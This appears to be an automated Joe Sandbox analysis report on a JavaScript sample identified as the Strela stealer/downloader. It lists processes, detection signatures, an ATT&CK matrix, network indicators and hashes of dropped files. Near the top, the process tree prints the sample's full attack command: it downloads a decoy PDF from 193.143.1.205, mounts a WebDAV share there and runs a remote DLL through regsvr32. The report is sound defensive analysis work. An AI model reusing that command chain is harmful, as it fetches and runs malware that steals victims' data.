Windows
Analysis Report
2634817597621928878.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 6680 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\26348 1759762192 8878.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 1476 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user~1 \AppData\L ocal\Temp\ invoice.pd f http://1 93.143.1.2 05/invoice .php"&&sta rt C:\User s\user~1\A ppData\Loc al\Temp\in voice.pdf& &cmd /c ne t use \\19 3.143.1.20 5@8888\dav wwwroot\&& cmd /c reg svr32 /s \ \193.143.1 .205@8888\ davwwwroot \221223676 13228.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1260 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5848 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user~1\Ap pData\Loca l\Temp\inv oice.pdf h ttp://193. 143.1.205/ invoice.ph p" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7488 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user ~1\AppData \Local\Tem p\invoice. pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7756 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7944 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 68 --field -trial-han dle=1544,i ,141461020 2341436943 0,58520377 1081955191 1,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7836 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | ReversingLabs | Script-JS.Trojan.StrelaStealer | ||
11% | Virustotal | Browse |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1589067 |
Start date and time: | 2025-01-11 09:06:29 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 57s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 25 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 2634817597621928878.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/63@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 162.159.61.3, 172.64.41.3, 199.232.214.172, 2.23.242.162, 23.209.209.135, 2.16.168.105, 2.16.168.107, 23.200.0.21, 23.200.0.33, 192.168.2.7, 13.107.246.45, 20.12.23.50, 52.22.41.97, 23.47.168.24
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
03:07:30 | API Interceptor | |
03:07:35 | API Interceptor | |
03:07:35 | API Interceptor | |
03:07:44 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7066931872889444 |
Encrypted: | false |
SSDEEP: | 1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqq:2JIB/wUKUKQncEmYRTwh0m |
MD5: | C35B449D4C36CD563FE6B319A0DACB15 |
SHA1: | F49CD43E4EDE956859E867476CF2DED6221077C6 |
SHA-256: | 3BD5D894200F33F9AE877309E5A8E53D732ED3CFD8C8CC9CE075A2E79ECEDF9E |
SHA-512: | 6C1A9453B8C4264D46DAD3BB5E30752FE8BE9517439769C8AE89D83D54E8E178617F3FA2CFD17A76769014DFD537368D4E129579382014B86C3238B42BEE96ED |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7899980491064541 |
Encrypted: | false |
SSDEEP: | 1536:LSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:LazaPvgurTd42UgSii |
MD5: | 24F30CF24D9A402B42403DFC1D563C2B |
SHA1: | A446963B6CDE084191E01629494644F1697F8AA6 |
SHA-256: | A5DCCD9449247E2F5AECC564C179B65FFCBF25327B606BDB379C7F1768A3B0E3 |
SHA-512: | 19C7FE82A7A75A2ED980539E2B7C3D63035A7F33E992FF3F080D4DD9B94460A1724107104FD89DD7770FAAE8A4AA2790F0DA0265C66F1151888A988EAC6D1624 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08166935598889238 |
Encrypted: | false |
